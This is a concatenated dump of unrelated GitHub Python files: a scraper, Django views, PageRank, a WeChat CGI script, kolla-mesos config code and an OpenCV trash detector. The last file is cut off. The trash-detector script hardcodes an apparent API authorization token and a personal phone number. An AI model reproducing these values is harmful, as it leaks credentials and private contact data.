\\Turing\\14-Spider\\v34.py\n@Description: \n@version: \n'''\n\n\nfrom urllib import request\nimport requests\nfrom bs4 import BeautifulSoup\nimport re\n\n'''\nBeautifulSoup结合正则匹配\n'''\n\nurl = 'http://www.baidu.com'\n\n# rsp = request.urlopen(url)\n# content = rsp.read()\n\nheaders = {\n \"User-Agent\":\"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.119 Safari/537.36\"\n}\n\nrsp = requests.get(url,headers=headers)\ncontent = rsp.text\n\n# html字节\"还原\"成html\nsoup = BeautifulSoup(content, 'lxml')\n\nprint(\"==\" * 12)\ntags = soup.find_all(re.compile('^me'), content=\"always\") # 将content作为搜索tag的属性\nfor tag in tags:\n print(tag)\nprint(\"==\" * 12)\n","repo_name":"legend3/Turing","sub_path":"14-Spider/v34.py","file_name":"v34.py","file_ext":"py","file_size_in_byte":830,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21980835980","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom .models import *\nfrom .forms import *\nfrom django.contrib.auth import logout\n\n\n@login_required\ndef about(request):\n\n return render(request, 'about.html')\n\n@login_required\ndef home(request):\n business = Bussiness.objects.all().order_by('-id')\n neighborhoods = NeighborHood.objects.all().order_by('-id')\n\n context = {'business': business, 'neighborhoods': neighborhoods}\n\n return render(request, 'home.html', context)\n\ndef logout_view(request):\n logout(request)\n return redirect('login')\n\n@login_required\ndef profile(request, prof_id):\n user = User.objects.get(pk = prof_id)\n \n profile = profileUser.objects.filter(user=prof_id)\n business = Bussiness.objects.filter(owner=prof_id)\n neighborhood = NeighborHood.objects.filter(resider=prof_id)\n\n return render(request, 'profile.html', {\"profile\": profile, 'business' : business, 'neighborhood' : neighborhood})\n\n\n@login_required\ndef single_hood(request, neib_id):\n hood = NeighborHood.objects.filter(pk = neib_id)\n business = Bussiness.objects.filter(neighborhood=neib_id)\n\n return render(request, 'single_hood.html', {'hoods' : hood, 'business' : business})\n\n@login_required\ndef delete_hood(request, neib_id):\n leave = NeighborHood.objects.filter(pk = neib_id)\n\n return render(request, 'single_hood.html', {'leave': leave})\n@login_required\ndef single_business(request, biz_id):\n biz = Bussiness.objects.filter(pk = biz_id)\n\n return render(request, 'single_biz.html', {'biz': biz})\n\n@login_required\ndef single_neighbor(request, neg_id):\n neighbor = profileUser.objects.filter(user=neg_id)\n\n return render(request,'single_neighbor.html', {'neighbor': neighbor})\n\n\n@login_required\ndef updataProfile(request):\n current_user = request.user\n\n if request.method == 'POST':\n if profileUser.objects.filter(user_id = current_user).exists():\n form = ProfileupdateForm(request.POST, request.FILES, instance= profileUser.objects.get(user_id = current_user))\n\n else:\n form = ProfileupdateForm(request.POST, request.FILES)\n \n if form.is_valid():\n user_prof = form.save(commit=False)\n user_prof.user = current_user\n user_prof.save()\n\n return redirect('profile', current_user.id)\n \n else:\n if profileUser.objects.filter(user_id = current_user).exists():\n form = ProfileupdateForm(instance=profileUser.objects.get(user_id = current_user))\n\n else:\n form = ProfileupdateForm()\n \n return render(request, 'update.html', {'form' : form})\n\n@login_required\ndef create_neigborhood(request):\n\n current_user = request.user\n profile = profileUser.objects.get(user=current_user)\n\n if request.method == 'POST':\n form = NeighborHoodForm(request.POST, request.FILES)\n\n if form.is_valid():\n hood = form.save(commit=False)\n hood.resider = profile\n hood.save()\n print(hood)\n\n return redirect('profile', current_user.id)\n \n else:\n form = NeighborHoodForm()\n\n return render(request, 'neighbor.html', {'form' : form})\n\n@login_required\ndef my_business(request, biz_id):\n business = Bussiness.objects.filter(owner=biz_id)\n hood = NeighborHood.objects.filter(resider=biz_id)\n\n return render(request, 'my_business.html', {'business' : business, 'hood': hood})\n\n\n@login_required\ndef business(request):\n current_user = request.user\n\n profile = profileUser.objects.get(user=current_user)\n\n if request.method == 'POST':\n form = BussinessForm(request.POST, request.FILES)\n\n if form.is_valid():\n business = form.save(commit=False)\n business.owner = current_user\n business.save()\n\n return redirect('profile', current_user.id)\n \n else:\n form = BussinessForm()\n \n return render(request, 'business.html', {'form' : form})\n\n\n\n@login_required\ndef posts(request):\n posts = Posts.objects.all().order_by('-id')\n\n return render(request, 'posts.html', {'posts': posts})\n\n@login_required\ndef create_post(request):\n current_user = request.user\n\n profile = profileUser.objects.get(user=current_user)\n\n if request.method == 'POST':\n form = PostForm(request.POST, request.FILES)\n if form.is_valid():\n post = form.save(commit=False)\n post.owner = current_user\n post.save()\n\n return redirect('posts',)\n\n else:\n form = PostForm()\n\n return render(request, 'new_posts.html', {'form' : form})\n\n@login_required\ndef create_health(request):\n current_user = request.user\n profile = profileUser.objects.get(user=current_user)\n\n if request.method == 'POST':\n form = HealthForm(request.POST, request.FILES)\n\n if form.is_valid():\n health = form.save(commit=False)\n health.resider = current_user\n health.save()\n\n return redirect('centers')\n\n else:\n form = HealthForm()\n\n return render(request, 'health.html', {'form': form})\n\n@login_required\ndef centers(request):\n health = Health.objects.all().order_by('-id')\n\n return render(request, 'centers.html', {'health': health})\n\n@login_required\ndef police(request):\n police = Police.objects.all().order_by('-id')\n\n return render(request, 'police.html', {'police': police})\n\n@login_required\ndef create_police(request):\n current_user = request.user\n profile = profileUser.objects.get(user=current_user)\n\n if request.method == 'POST':\n form = PoliceForm(request.POST, request.FILES)\n\n if form.is_valid():\n police = form.save(commit=False)\n police.save()\n\n return redirect('police')\n\n else:\n form = PoliceForm()\n\n return render(request, 'create_police.html', {'form': form})","repo_name":"Brian569/neighbourhood","sub_path":"loop/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14305152278","text":"import numpy as np\nimport scipy.sparse\nfrom overrides import overrides\n\nclass PageRank(object) :\n def __init__(self, trans_matrix, dampening_factor=0.8, **kwargs) :\n assert trans_matrix.shape[0] == trans_matrix.shape[1]\n self.num_docs = trans_matrix.shape[0]\n self.matrix = trans_matrix.transpose()\n self.df = dampening_factor\n self.bias = np.repeat(1/self.num_docs, self.num_docs)\n self.interpolation()\n\n def interpolation(self):\n rowwise_sum = self.matrix.transpose().sum(axis=1).view(np.ndarray).squeeze() - 1\n self.inter_factor = -rowwise_sum / self.num_docs\n\n def iteration(self, vector) :\n vector = self.df * self.matrix * vector + (1-self.df) * self.bias + self.df * np.dot(vector, self.inter_factor)\n return vector\n\n def converge(self, init_vector=None, stop_criterion=None) :\n stop_criterion = stop_criterion or 1e-8\n vector = init_vector or np.repeat(1.0/self.num_docs, self.num_docs)\n\n print(\"========== Power Iteration ==========\")\n iter_no = 0\n while True :\n prev_vector = vector.copy()\n vector = self.iteration(vector)\n iter_no += 1\n difference = np.sum(np.abs(vector - prev_vector))\n if iter_no % 10 == 0 :\n print(\"Iter {0:4d} | Difference : {1:4.4f}\".format(iter_no, difference))\n if difference < stop_criterion :\n print(\"Iter {0:4d} | Difference : {1:4.4f}\".format(iter_no, difference))\n break\n\n self.ranked_vector = vector\n print(\"================ End ================\")\n\n def scoring_function(self, candidate_index, retrieval_score, ranked_vector, criterion=\"ns\") :\n available_criterion = [\"ns\", \"ws\", \"cm\"]\n assert criterion in available_criterion\n if criterion == \"ns\" :\n score = ranked_vector\n elif criterion == \"ws\" :\n retrieval_weight = 1.\n pagerank_weight = 1.\n retrieval_score /= np.sqrt(sum(retrieval_score ** 2))\n ranked_vector /= np.sqrt(sum(ranked_vector ** 2))\n score = retrieval_weight * retrieval_score + pagerank_weight * ranked_vector\n elif criterion == \"cm\" :\n # score = np.zeros(ranked_vector.shape)\n # score = np.random.randn(*ranked_vector.shape)\n retrieval_score -= np.mean(retrieval_score)\n ranked_vector -= np.mean(ranked_vector)\n score = np.tanh(retrieval_score) + np.tanh(ranked_vector)\n\n score_ranking = np.argsort(score)[::-1]\n if candidate_index is None :\n candidate_index = [i for i in range(len(ranked_vector))]\n sorted_index = np.array(candidate_index)[score_ranking]\n sorted_score = score[score_ranking]\n return sorted_index, sorted_score\n\n def ranking(self, candidate_index, retrieval_score, criterion=\"ns\", stop_criterion=None, pre_computed=True) :\n if not pre_computed :\n self.converge(stop_criterion=stop_criterion)\n pagerank = self.ranked_vector[candidate_index]\n ranking_result = self.scoring_function(candidate_index, retrieval_score, pagerank, criterion=criterion)\n return ranking_result\n\n\nclass TopicSensitivePageRank(PageRank):\n def __init__(self, trans_matrix, topic_matrix, dampening_factor=0.8, topic_factor=0.1):\n super(TopicSensitivePageRank, self).__init__(trans_matrix, dampening_factor=dampening_factor)\n assert dampening_factor + topic_factor <= 1\n self.tf = topic_factor\n self.tmat = topic_matrix\n self.num_topics = topic_matrix.shape[1]\n self.bias = np.vstack([self.bias for _ in range(self.num_topics)]).transpose()\n\n @overrides\n def interpolation(self):\n rowwise_sum = self.matrix.transpose().sum(axis=1).view(np.ndarray).squeeze() - 1\n self.inter_factor = (-rowwise_sum / self.num_docs).reshape(1,-1)\n\n @overrides\n def iteration(self, matrix):\n matrix = self.df * self.matrix * matrix + self.tf * self.tmat + (1 - self.df - self.tf) * self.bias + self.df * np.dot(self.inter_factor,matrix)\n return matrix\n\n @overrides\n def converge(self, init_vector=None, topic_vector=None, stop_criterion=None) :\n stop_criterion = stop_criterion or 1e-8\n matrix = init_vector or np.repeat(1.0/self.num_docs, self.num_docs)\n matrix = np.vstack([matrix for _ in range(self.num_topics)]).transpose()\n\n print(\"========== Power Iteration ==========\")\n iter_no = 0\n while True :\n prev_matrix = matrix.copy()\n matrix = self.iteration(matrix)\n iter_no += 1\n difference = np.sum(np.abs(matrix - prev_matrix)) / self.num_topics\n if iter_no % 10 == 0 :\n print(\"Iter {0:4d} | Difference : {1:4.4f}\".format(iter_no, difference))\n if difference < stop_criterion :\n print(\"Iter {0:4d} | Difference : {1:4.4f}\".format(iter_no, difference))\n break\n\n self.ranked_matrix = matrix\n # print(matrix.sum(axis=0))\n print(\"================ End ================\")\n return matrix\n\n @overrides\n def ranking(self, candidate_index, retrieval_score, topic_probs, criterion=\"ns\", stop_criterion=None, pre_computed=True):\n # topic_probs shape : (12,1)\n if not pre_computed :\n self.converge(stop_criterion=stop_criterion)\n tpagerank = (self.ranked_matrix * topic_probs.reshape(12,1)).view(np.ndarray).squeeze()\n tpagerank = tpagerank[candidate_index]\n\n ranking_result = self.scoring_function(candidate_index, retrieval_score, tpagerank, criterion=criterion)\n return ranking_result\n\nif __name__ == \"__main__\" :\n # Test code for evaluating PageRank\n transition_matrix = scipy.sparse.load_npz(\"./data/transition_matrix.npz\")\n doc_topic_matrix = scipy.sparse.load_npz(\"./data/doc_topic_matrix.npz\")\n gpr = PageRank(trans_matrix=transition_matrix, dampening_factor=0.8)\n tspr = TopicSensitivePageRank(trans_matrix=transition_matrix, topic_matrix=doc_topic_matrix, dampening_factor=0.8, topic_factor=0.1)\n\n gpr.converge()\n print(\"Sample Ranked Vector : \", gpr.ranked_vector)\n print(\"GPR Convergence Checked!\")\n tspr.converge()\n print(\"Sample Ranked Matrix : \", tspr.ranked_matrix)\n print(\"TSPR Convergence Checked!\")","repo_name":"matbambbang/PageRank_python","sub_path":"pagerank.py","file_name":"pagerank.py","file_ext":"py","file_size_in_byte":6390,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"70939369449","text":"#!/bin/env python3\n\n# bruteforce is still faster on this scale\n\nN = 29000000\nn = N // 10\n\nhouse = [1]*(n+1)\nfor i in range(2, n+1):\n for j in range(i, n, i):\n house[j] += i\n\nfor i, h in enumerate(house):\n if h >= n:\n print(i)\n break\n\nhouse = [0]+[11]*(50)+[0]*(n-50)\nfor i in range(2, n+1):\n for j in range(i, 51*i, i):\n if j >= n:\n break\n house[j] += i*11\n\nfor i, h in enumerate(house):\n if h >= N:\n print(i)\n break\n","repo_name":"f-koehler/adventofcode","sub_path":"d20.py","file_name":"d20.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6696051499","text":"#!\r\n# -*- coding: utf-8 -*-\r\n\r\nimport cgi\r\nimport pymysql\r\nimport datetime\r\nimport json\r\nimport re\r\n\r\n# 数据库连接信息字典\r\ndef config(database):\r\n db_config = {\r\n \"host\": \"localhost\",\r\n \"port\": 3306,\r\n \"user\": \"你的用户名\",\r\n \"password\": \"你的密码\",\r\n \"database\": database,\r\n \"charset\": \"utf8\"\r\n }\r\n return db_config\r\n\r\n# 数据库连接\r\ndef connect_and_query(query, values, database):\r\n db_config = config(database)\r\n\r\n try:\r\n # 连接数据库\r\n connection = pymysql.connect(**db_config)\r\n\r\n with connection.cursor() as cursor:\r\n # 执行查询语句\r\n cursor.execute(query, values)\r\n result = cursor.fetchall()\r\n\r\n # 提取查询结果中的实际数据部分\r\n data_list = [list(result) for result in result]\r\n data_list = data_list[0]\r\n\r\n return data_list\r\n\r\n except Exception as e:\r\n print(\"Content-type: text/json\\n\")\r\n print(e)\r\n\r\n finally:\r\n # 关闭数据库连接\r\n connection.close()\r\n\r\n\r\n# 获取今天的日期\r\ntoday = datetime.datetime.today()\r\n\r\n# 获取今天是星期几(0表示星期一,6表示星期日)\r\nday_of_week = today.weekday()\r\n\r\n# 提取年、月、日\r\nyear = today.year\r\nmonth = today.month\r\nday = today.day\r\n\r\n# 拼接为年.月.日的字符串\r\nyear_month_day = f\"{year}.{month}.{day}\" # 表名\r\n\r\n# 获取传递的参数\r\nform = cgi.FieldStorage()\r\nbuildingName = json.loads(form.getvalue('buildingName'))\r\nclassroomNumber = json.loads(form.getvalue('classroomNumber'))\r\n\r\n# 查找数据\r\nclassroomState = [None, None, None] # 结果\r\nfor i in range(3):\r\n if (buildingName[i] is not None):\r\n q = f\"SELECT * FROM `{year_month_day}` WHERE classroom = %s\"\r\n classroomState[i] = connect_and_query(q, (classroomNumber[i],), buildingName[i])\r\n else:\r\n classroomState[i] = None\r\n\r\n# 构建结果字典\r\nresult_dict = {'classroomState': classroomState, 'today_name': day_of_week}\r\n\r\n# 将结果字典转换为 JSON 格式的字符串\r\nresult_json = json.dumps(result_dict, ensure_ascii=True)\r\n# 返回结果\r\nprint(\"Content-type: application/json; charset=utf-8\\n\")\r\nprint(result_json)\r\n","repo_name":"yuer-you/where-to-learn-WeChatAPP","sub_path":"后端/getClassroomCollect.py","file_name":"getClassroomCollect.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"28145665000","text":"# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport os.path\n\nfrom kazoo import exceptions as kz_exceptions\nfrom oslo_config import cfg\nfrom oslo_log import log as logging\nimport yaml\n\nfrom kolla_mesos.common import file_utils\nfrom kolla_mesos.common import jinja_utils\nfrom kolla_mesos.common import mesos_utils\nfrom kolla_mesos.common import type_utils\nfrom kolla_mesos import exception\n\nLOG = logging.getLogger()\nCONF = cfg.CONF\nCONF.import_group('kolla', 'kolla_mesos.config.kolla')\nCONF.import_group('kolla', 'kolla_mesos.config.zookeeper')\n\n\ndef write_variables_zookeeper(zk, variables, base_node=None, overwrite=True):\n if base_node is None:\n base_node = os.path.join('kolla', CONF.kolla.deployment_id)\n filter_out = ['groups', 'hostvars', 'kolla_config',\n 'inventory_hostname']\n for var in variables:\n if (var in filter_out):\n LOG.debug('Var \"%s\" with value \"%s\" is filtered out' %\n (var, variables[var]))\n continue\n var_value = variables[var]\n if isinstance(variables[var], dict):\n var_value = json.dumps(variables[var])\n var_path = os.path.join(base_node, 'variables', var)\n if not overwrite and zk.exists(var_path):\n LOG.debug('NOT Updating \"%s\" node in zookeeper(overwrite=False).',\n var_path)\n return\n zk.ensure_path(var_path)\n if var_value is None:\n var_value = ''\n zk.set(var_path, var_value.encode('utf-8'))\n LOG.debug('Updated \"%s\" node in zookeeper.' % var_path)\n\n\ndef get_start_config(config_dir, jinja_vars):\n start_conf = os.path.join(config_dir,\n 'common/kolla-start-config.json')\n # override container_config_directory\n cont_conf_dir = 'zk://%s' % (CONF.zookeeper.host)\n jinja_vars['container_config_directory'] = cont_conf_dir\n jinja_vars['deployment_id'] = CONF.kolla.deployment_id\n kolla_config = jinja_utils.jinja_render(start_conf, jinja_vars)\n kolla_config = kolla_config.replace('\"', '\\\\\"').replace('\\n', '')\n return kolla_config\n\n\ndef write_common_config_to_zookeeper(config_dir, zk, jinja_vars,\n overwrite=True):\n # 1. At first write global tools to ZK. FIXME: Make it a common profile\n conf_path = os.path.join(config_dir, 'common',\n 'common_config.yml.j2')\n common_cfg = yaml.load(jinja_utils.jinja_render(conf_path, jinja_vars))\n common_node = os.path.join('kolla', 'common')\n for script in common_cfg:\n script_node = os.path.join(common_node, script)\n if not overwrite and zk.exists(script_node):\n LOG.debug('NOT Updating \"%s\" node in zookeeper(overwrite=False).',\n script_node)\n continue\n\n zk.ensure_path(script_node)\n source_path = common_cfg[script]['source']\n src_file = source_path\n if not source_path.startswith('/'):\n src_file = file_utils.find_file(source_path)\n with open(src_file) as fp:\n content = fp.read()\n zk.set(script_node, content.encode('utf-8'))\n\n\ndef get_variables_from_zookeeper(zk, needed_variables):\n path = os.path.join('/kolla', CONF.kolla.deployment_id, 'variables')\n variables = {}\n for var in needed_variables:\n try:\n variables[str(var)], _stat = zk.get(os.path.join(path, var))\n except kz_exceptions.NoNodeError:\n raise exception.KollaNotFoundException(var, entity='variable')\n\n return variables\n\n\ndef apply_deployment_vars(jvars):\n \"\"\"Applies the orchestration logic defined in globals.yml.\n\n If multinode mode is enabled, then it uses the default constraints.\n And depending on the 'autodetect_resources' option, it figures out\n how many instances of the services should be scheduled.\n If multinode mode is disabled, then it checks whether\n 'mesos_aio_hostname' option is defined. If it is, then the\n constraints for the given host are defined. If not, the constraints\n disappear.\n \"\"\"\n multinode = type_utils.str_to_bool(jvars['multinode'])\n if multinode:\n autodetect_resources = type_utils.str_to_bool(\n jvars['autodetect_resources'])\n if autodetect_resources:\n controller_nodes, compute_nodes, storage_nodes, all_nodes = \\\n mesos_utils.get_number_of_nodes()\n else:\n try:\n controller_nodes = jvars['controller_nodes']\n compute_nodes = jvars['compute_nodes']\n storage_nodes = jvars['storage_nodes']\n except KeyError:\n raise exception.UndefinedOption(\n 'When \"autodetect_resources\" option is disabled, '\n '\"controller_nodes\", \"compute_nodes\" and'\n '\"storage_nodes\" have to be defined.')\n all_nodes = controller_nodes + compute_nodes + storage_nodes\n else:\n controller_nodes = 1\n compute_nodes = 1\n storage_nodes = 1\n all_nodes = 1\n controller_constraints = \"\"\n compute_constraints = \"\"\n controller_compute_constraints = \"\"\n storage_constraints = \"\"\n mesos_aio_hostname = jvars.get('mesos_aio_hostname')\n if mesos_aio_hostname is not None:\n constraints = '[[\"hostname\", \"CLUSTER\", \"%s\"]]' % \\\n mesos_aio_hostname\n controller_constraints = constraints\n compute_constraints = constraints\n controller_compute_constraints = constraints\n storage_constraints = constraints\n jvars.update({\n 'controller_constraints': controller_constraints,\n 'compute_constraints': compute_constraints,\n 'controller_compute_constraints':\n controller_compute_constraints,\n 'storage_constraints': storage_constraints\n }, force=True)\n jvars.update({\n 'controller_nodes': str(controller_nodes),\n 'compute_nodes': str(compute_nodes),\n 'storage_nodes': str(storage_nodes),\n 'all_nodes': str(all_nodes)\n }, force=True)\n\n\ndef get_marathon_framework(jvars):\n try:\n mframework = jvars['marathon_framework']\n except KeyError:\n mframework = mesos_utils.get_marathon()\n if mframework is not None:\n jvars.update({'marathon_framework': mframework})\n else:\n raise exception.UndefinedOption(\n 'Please define marathon_framework')\n LOG.info('Marathon framework: %s' % mframework)\n","repo_name":"nhlfr/kolla-mesos","sub_path":"kolla_mesos/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":7080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24737147234","text":"from api.models import *\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse, HttpResponseRedirect\n\n\ndef is_post(request):\n return request.method == 'POST'\n\n\ndef get_random_user(request):\n random_user = []\n all_profile = Profile.objects.all()\n current_profile = Profile.objects.get(user=request.user)\n all_followed = get_follower_list(current_profile)\n for profile in all_profile:\n if profile not in random_user:\n if profile != current_profile:\n if profile not in all_followed:\n random_user.append(profile)\n\n return random_user\n\n\ndef get_follower_list(user):\n follows = Follow.objects.all()\n followed_user_list = []\n for f in follows:\n if f.following_user == user:\n followed_user_list.append(f.followed_user)\n return followed_user_list\n\n\ndef get_following_list(user):\n follows = Follow.objects.all()\n following_user_list = []\n for f in follows:\n if f.followed_user == user:\n following_user_list.append(f.following_user)\n return following_user_list\n\n\ndef create_if_vote_dont_exist(data, post_data, user_data, v_flag_data=None):\n if not data.objects.filter(post_id=post_data, user_id=user_data).exists():\n v = Vote(user_id=user_data, post_id=post_data, v_flag=v_flag_data)\n v.save()\n\n\ndef un_vote(data, post_data, user_data):\n data.objects.filter(\n post_id=post_data, user_id=user_data).delete()\n Notification.objects.filter(\n notification_type=1, to_user=post_data.user_id.user, from_user=user_data.user, post=post_data).delete()\n Notification.objects.filter(\n notification_type=4, to_user=post_data.user_id.user, from_user=user_data.user, post=post_data).delete()\n\n\ndef up_vote(data, post_data, user_data):\n data.objects.filter(\n post_id=post_data, user_id=user_data).update(v_flag=True)\n Notification.objects.create(\n notification_type=1, to_user=post_data.user_id.user, from_user=user_data.user, post=post_data)\n\n\ndef down_vote(data, post_data, user_data):\n data.objects.filter(\n post_id=post_data, user_id=user_data).update(v_flag=False)\n Notification.objects.create(\n notification_type=4, to_user=post_data.user_id.user, from_user=user_data.user, post=post_data)\n\n\ndef vote(request, selected_up_vote_btn, selected_down_vote_btn, post_id, user_id):\n if selected_up_vote_btn in request.POST:\n create_if_vote_dont_exist(Vote, post_id, user_id)\n current_selected_vote = Vote.objects.get(\n post_id=post_id, user_id=user_id)\n if current_selected_vote.v_flag != True:\n up_vote(Vote, post_id, user_id)\n else:\n un_vote(Vote, post_id, user_id)\n if selected_down_vote_btn in request.POST:\n create_if_vote_dont_exist(Vote, post_id, user_id)\n current_selected_vote = Vote.objects.get(\n post_id=post_id, user_id=user_id)\n if current_selected_vote.v_flag != False:\n down_vote(Vote, post_id, user_id)\n else:\n un_vote(Vote, post_id, user_id)\n\n\ndef comment(request, comment_form, post, current_profile):\n parent_obj = None\n try:\n parent_id = int(request.POST['parent_id'])\n except:\n parent_id = None\n if is_comment_have_parent(parent_id):\n parent_obj = Comment.objects.get(id=parent_id)\n if is_parent_obj_exist(parent_obj):\n replay_comment = comment_form.save(commit=False)\n replay_comment.parent = parent_obj\n save_comment(comment_form, post, current_profile)\n\n\ndef is_comment_have_parent(parent_id):\n return True if parent_id else None\n\n\ndef is_parent_obj_exist(parent_obj):\n return True if parent_obj else None\n\n\ndef save_comment(comment_form, post, current_profile):\n new_comment = comment_form.save(commit=False)\n # assign ship to the comment\n new_comment.post_id = post\n new_comment.user_id = current_profile\n\n new_comment.depth += 2\n if new_comment.parent:\n new_comment.depth += new_comment.parent.depth\n # new_comment.user_id = current_user\n # save\n\n new_comment.save()\n user = get_user(post)\n notification = Notification.objects.create(\n notification_type=2, to_user=user, comment=new_comment)\n\n\ndef get_user(post):\n userprofile = post.user_id\n user = userprofile.user\n\n return user\n\n\ndef get_single_post_vote(request, post):\n vote_list = {}\n current_vote = Vote.objects.filter(post_id=post)\n vote_list[post] = current_vote\n\n return vote_list\n\n\ndef get_multiple_post_vote(request, posts):\n vote_list = {}\n for post in posts:\n current_vote = Vote.objects.filter(post_id=post)\n vote_list[post] = current_vote\n return vote_list\n\n\ndef voting_on_multiple_post_page(request, posts):\n votes = {}\n for post in posts:\n create_rank_of_post(request, post)\n selected_up_vote_btn = f'upvote-{post.get_id()}'\n selected_down_vote_btn = f'downvote-{post.get_id()}'\n current_vote = Vote.objects.filter(post_id=post)\n votes[post] = current_vote\n post_id = post\n user_id = request.user\n current_profile = Profile.objects.get(user_id=user_id)\n vote(request, selected_up_vote_btn, selected_down_vote_btn,\n post_id, current_profile)\n calculate_best_score(request, post)\n calculate_controversial_score(request, post)\n\n\ndef voting_on_singular_post_page(request, post):\n votes = {}\n selected_up_vote_btn = f'upvote-{post.id}'\n selected_down_vote_btn = f'downvote-{post.id}'\n current_vote = Vote.objects.filter(post_id=post)\n post_id = post\n user_id = request.user\n current_profile = Profile.objects.get(user_id=user_id)\n vote(request, selected_up_vote_btn, selected_down_vote_btn,\n post_id, current_profile)\n calculate_best_score(request, post)\n calculate_controversial_score(request, post)\n\n\ndef calculate_best_score(request, post):\n post_rank = Rank.objects.get(post_id=post)\n upvote_count = 0\n votes = Vote.objects.filter(post_id=post)\n for vote in votes:\n if vote.v_flag:\n upvote_count += 1\n post_rank.best = upvote_count\n post_rank.save()\n\n\ndef calculate_controversial_score(request, post):\n post_rank = Rank.objects.get(post_id=post)\n down_vote_count = 0\n votes = Vote.objects.filter(post_id=post)\n for vote in votes:\n if not vote.v_flag:\n down_vote_count += 1\n post_rank.controversial = down_vote_count\n post_rank.save()\n\n\ndef create_rank_of_post(request, post):\n if Rank.objects.filter(post_id=post).exists():\n return\n rank = Rank(post_id=post)\n rank.save()\n\n\ndef today_time(time):\n return datetime.datetime.today().replace(hour=time.hour, minute=time.minute, second=time.second,\n microsecond=time.microsecond, tzinfo=time.tzinfo)\n\n\ndef times_to_delta(start_time, end_time):\n return today_time(end_time) - today_time(start_time)\n\n\ndef send_message(request, user_id):\n message_value = request.GET['message']\n print(message_value)\n print(message_value)\n print(message_value)\n print(message_value)\n print(message_value)\n print(message_value)\n print(message_value)\n return redirect(f'/chat/{user_id}')\n\n\ndef delete_profile(username):\n user = User.objects.get(username=username)\n print(user)\n delete_profile = Profile.objects.filter(user=user).delete()\n delete_user = User.objects.filter(username=username).delete()\n\n\ndef delete_notification(user):\n f_notifications = Notification.objects.filter(from_user=user).delete()\n t_notifications = Notification.objects.filter(to_user=user).delete()\n\n\ndef delete_follow(following_user, followed_user):\n delete_follow = Follow.objects.get(\n following_user=following_user, followed_user=followed_user)\n delete_follow.delete()\n\n\ndef delete_follow_notifications(following_user, followed_user, type=3):\n delete_notification = Notification.objects.filter(\n notification_type=type, from_user=following_user.user, to_user=followed_user.user)\n delete_notification.delete()\n\n\ndef add_follow(following_user, followed_user):\n new_follow = Follow.objects.create(\n following_user=following_user, followed_user=followed_user)\n new_follow.save()\n\n\ndef add_follow_notifications(following_user, followed_user, type=3):\n new_notification = Notification.objects.create(\n notification_type=3, from_user=following_user.user, to_user=followed_user.user)\n new_notification.save()\n","repo_name":"Ricar1502/Website","sub_path":"snova_social_media/app/func.py","file_name":"func.py","file_ext":"py","file_size_in_byte":8638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1444765313","text":"import numpy as np\nfrom sklearn.decomposition import NMF, non_negative_factorization\n\nR = [\n [5,3,0,1],\n [4,0,0,1],\n [1,1,0,5],\n [1,0,0,4],\n [0,1,5,4],\n ]\n\nR = np.array(R)\nnmf = NMF(n_components=2, init='random', random_state=0)\n\nW = nmf.fit_transform(R);\nH = nmf.components_;\nnR = np.dot(W,H)\n\nprint(nmf)\nprint(\"W\");\nprint(W);\nprint(\"H\");\nprint(H);\nprint(R);\nprint(nR);\nS = [\n [6,4,1,2],\n ]\n\nnS=nmf.transform(S);\nprint(S);\nprint(nS);\n\n\n\nfixed_H=H;\nW, H, n_iter = non_negative_factorization(R, n_components=2, init='custom', random_state=0, update_H=False, H=fixed_H)\n\n\nprint(\"W\");\nprint(W);\nprint(\"H\");\nprint(H);\n","repo_name":"grenaud/cinch","sub_path":"nmftest.py","file_name":"nmftest.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29719247754","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sun Jul 1 09:06:06 2018\r\n\r\n@author: Ian\r\n\"\"\"\r\nimport requests\r\nimport cv2\r\nimport numpy as np\r\nimport json\r\n\r\n\r\ndef triggered(message):\r\n url = 'https://bosch-ville-api.unificationengine.com/v1/message/send'\r\n api_token = 'Y2gmZGV2aWNlX3R5cGU9WERJ'\r\n headers = {'Content-Type': 'application/json', 'Authorization': api_token}\r\n body = {\"phone_number\": \"+6598287932\",\"message\": message}\r\n r = requests.post(url, data=json.dumps(body), headers=headers)\r\n \r\n \r\n#this is the cascade we just made. Call what you want\r\ntrash_cascade = cv2.CascadeClassifier('cascade.xml')\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\nwhile True:\r\n \r\n ret, img = cap.read()\r\n \r\n if ret is True:\r\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n else: \r\n print(\"ret is False\")\r\n \r\n trash = trash_cascade.detectMultiScale(gray, 20,20)\r\n\r\n for (x,y,w,h) in trash:\r\n cv2.rectangle(img ,(x,y),(x+w,y+h),(255,255,0),2)\r\n font = cv2. FONT_HERSHEY_SIMPLEX\r\n cv2.putText(img, 'Trash', (w-x,y-h), font, 0.5,(255,255,0), 2, cv2.LINE_AA)\r\n \r\n 